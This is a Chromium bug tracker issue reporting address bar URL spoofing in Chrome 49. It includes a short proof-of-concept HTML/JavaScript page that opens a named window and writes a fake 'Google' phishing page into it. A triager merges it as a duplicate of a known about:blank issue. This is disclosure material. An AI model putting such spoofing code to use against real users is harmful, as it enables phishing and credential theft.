Issue 609722 link

Starred by 1 user

Issue metadata

Status:	Duplicate
Merged:	issue 466422
Owner:	----
Closed:	May 2016
EstimatedDays:	----
NextAction:	----
OS:	----
Pri:	----
Type:	Bug-Security
allpublic Team-Security-UX

Security: Google Chorme Browser 49.0.2623.110 m - Address Bar URL Spoofing

Reported by junjian2...@gmail.com, May 6 2016

Issue description

Google Chorme Browser  - Address Bar URL Spoofing

Chorme Browser   Version : 49.0.2623.110 m

POC:


<SCRIPT LANGUAGE="JavaScript">
function winopen()
{
	OW=window.open("", "newwindow");
	OW.document.write("<TITLE>Google</TITLE>");
	OW.document.write("<h1>The Phishing Page !!</h1>");
	OW.document.close();
}
</SCRIPT>
<a href="https://www.google.com.hk/" target="newwindow" onclick="setTimeout('winopen()', 1);">Google Home Page</a>

poc.html
439 bytes View Download

Comment 1 by f...@chromium.org, May 6 2016

Components: Security>UX
Labels: -Restrict-View-SecurityTeam
Mergedinto: 466422
Status: Duplicate (was: Unconfirmed)

Thanks for the report. This appears to leverage the confusion over about: blank windows, which is being worked on in https://bugs.chromium.org/p/chromium/issues/detail?id=466422.

Comment 2 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 3 by lafo...@chromium.org, Dec 9 2016

Components: -Security>UX
Labels: Team-Security-UX

Security>UX component is deprecated in favor of the Team-Security-UX label

►

Issue 609722 link

Issue metadata

Security: Google Chorme Browser 49.0.2623.110 m - Address Bar URL Spoofing

Issue description

Comment 1 by f...@chromium.org, May 6 2016

Comment 1 Deleted

Comment 2 by mbarbe...@chromium.org, Oct 2 2016

Comment 2 Deleted

Comment 3 by lafo...@chromium.org, Dec 9 2016

Comment 3 Deleted

Sign in to add a comment